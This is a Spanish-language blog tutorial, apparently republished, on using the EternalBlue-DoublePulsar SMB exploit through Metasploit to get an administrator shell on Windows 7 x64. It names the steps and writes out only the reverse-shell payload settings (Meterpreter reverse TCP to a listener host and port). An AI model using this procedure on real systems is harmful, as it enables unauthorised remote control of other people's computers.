Atacando Windows 7 y consiguiendo privilegios

Hoy vengo a hablar sobre una vulnerabilidad bastante reciente encontrada en los sistemas Windows que permiten obtener una shell con permisos de administrador aprovechando una vulnerabilidad en el protocolo smb que utiliza. En mi caso atacaremos un Windows 7 de 64 bits.

La vulnerabilidad es Eternalblue-Doublepulsar dicha vulnerabilidad podemos encontrarla en Github para añadir el módulo a Metasploit, una vez dicho esto vamos a descargar el código y añadirlo a nuestros exploits.

GitHub del código

Clonamos el código a nuestra máquina

copiamos el código a la carpeta de Metasploit

En este punto ya estamos listos para iniciar Metasploit y configurar el exploit para lanzar el ataque, lo cuál realizaremos a continuación. Tenemos que tener en cuenta que dependiendo si la versión que vamos a atacar el 32 o 64 bits tendremos que cambiar la configuración.

Iniciamos Metasploit

Seleccionamos el exploit

Vemos los objetivos que son afectados por el exploit

Configuramos el exploit para una versión de 64 bits

En este paso tenemos que configurar el payload de la siguiente forma

set payload windows/x64/meterpreter/revrese_tcp
 set lhost 192.168.1.21
 set lport 4444

Una vez configurado el payload lanzamos el exploit

Lanzamos el exploit que nos devuelve una Sesión de Meterpreter

Comprobamos que la sesión tiene los máximos privilegios

Con esto ya tenemos la vulnerabilidad explotada y la shell conseguida 🙂

Fuente: https://www.thepiratillateam.com/2017/05/11/atacando-windows-7-y-consiguiendo-priveilegios/

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *